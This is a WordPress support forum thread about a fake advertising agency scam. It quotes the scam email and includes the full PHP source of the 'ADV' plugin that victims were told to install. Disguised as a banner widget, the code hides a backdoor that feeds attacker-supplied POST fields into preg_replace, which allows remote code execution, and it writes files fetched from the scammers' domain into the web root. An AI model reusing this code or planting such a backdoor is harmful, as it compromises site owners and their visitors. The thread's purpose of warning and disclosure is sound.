I installed a Fake Plugin sent by https://lemmaagency.com/

Can you link to the plugin, if it is to free to download as I may have a tiny bit of time to see what it did.

Thanks for your reply snat

Actually I have removed this “adv” plugin from my site as well as from my pc. Now the fake website lemmaagency.com has also been suspended so I don’t have any link to their plugin for you.

here is email last email that I received from “Lilian Marchand” which contains installation information:

————

Hi!

Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link https://webmaster.lemmaagency.com
To enter use the following data:

login: birthcertificatepakistan.com
password: YXQ2O3

You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web- address (for example: https://birthcertificatepakistan.com/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: https://docs.lemmaagency.com/wp_install
To activate your site you have to enter the code: 8M2-ZIU-TB9

What way of payment is suitable for you?

Best regards,
Lilian Marchand.
site: https://www.lemmaagency.com
e-mail: [email protected]
phone: + (0)9 78 62 24 83
———-

Thanks for your help.

Thanks

Kashif Aman

it certainly sounds fishy. without a way to see the plugin, we can only speculate on what this plugin may have done to your site.

It could have sent your admin username and password somewhere – so changing all passwords on the site may be a good idea.

It may have made changes to code in your WordPress core files, plugin files or theme files. Or added/ changed something in the database.

Changes might be masked on the front end to only be seen by people with a particular browser, or by search bots

replacing the files and database with the last known clean backups would be prudent in cases where a hacked site is suspected.

I was hit by the same banner ad scam in December.

I emailed LaCoste (the company the scammers where pretending to be selling ads for), and the LaCoste representative verified that these people are illegitimate.

Here is the code from the plugin they are pushing:

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'ritaagency.com');
define('ADV_SERVICE_URL', 'https://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('https://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}

?>

I am not good in php and unable to understand above code but this plugin damaged alexa ranking of my site in big way. I have restored old backup of my site and changed all security passwords from wp-admin to cpanel and database (all possible). Now all looks good..

Thanks